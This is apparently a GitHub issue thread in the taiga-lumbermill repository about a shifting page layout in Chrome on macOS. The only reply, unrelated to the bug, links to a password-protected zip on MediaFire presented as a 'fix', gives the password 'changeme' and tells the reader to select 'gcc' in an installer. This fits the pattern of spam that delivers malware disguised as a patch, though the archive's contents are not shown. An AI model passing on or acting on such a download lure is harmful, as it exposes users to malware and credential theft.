### ISSUE TITLE
🐞 - crypto page layout issues fix

### ISSUE THREAD

**Issue by vladimirpotekhin** [taiga-family/taiga-lumbermill#164]
### Playground Link

-

### Description

fix shifting layout

### Which browsers have you used?

- [X] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Edge

### Which operating systems have you used?

- [X] macOS
- [ ] Windows
- [ ] Linux
- [ ] iOS
- [ ] Android

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
